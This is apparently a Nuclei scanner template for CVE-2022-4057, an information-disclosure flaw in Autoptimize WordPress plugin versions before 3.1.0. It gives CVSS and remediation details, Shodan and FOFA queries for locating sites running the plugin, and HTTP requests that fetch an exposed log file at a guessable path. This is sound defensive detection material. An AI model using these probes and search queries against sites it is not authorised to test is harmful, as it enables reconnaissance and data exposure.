Description
The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs.
The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs.
id: CVE-2022-4057
info:
name: Autoptimize < 3.1.0 - Information Disclosure
author: DhiyaneshDK
severity: medium
description: |
The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs.
impact: |
An attacker can gain access to sensitive information, potentially leading to further attacks.
remediation: |
Upgrade to Autoptimize version 3.1.0 or later to fix the information disclosure vulnerability.
reference:
- https://wpscan.com/vulnerability/95ee1b9c-1971-4c35-8527-5764e9ed64af
- https://wordpress.org/plugins/autoptimize/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4057
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-4057
cwe-id: CWE-425
epss-score: 0.0146
epss-percentile: 0.72255
cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: optimizingmatters
product: autooptimize
framework: wordpress
shodan-query: http.html:/wp-content/plugins/autoptimize
fofa-query: body=/wp-content/plugins/autoptimize
publicwww-query: /wp-content/plugins/autoptimize
tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html"
- "{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Job id <'
- 'log messages'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100be7c83799dcd027475fa0fd11a5312cebced2934641001ad563df9c2ab36121302201b5b684bccfb2142a75ebbcea24cfdffa50cd052a83664f9de4e1b56757f3a19:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.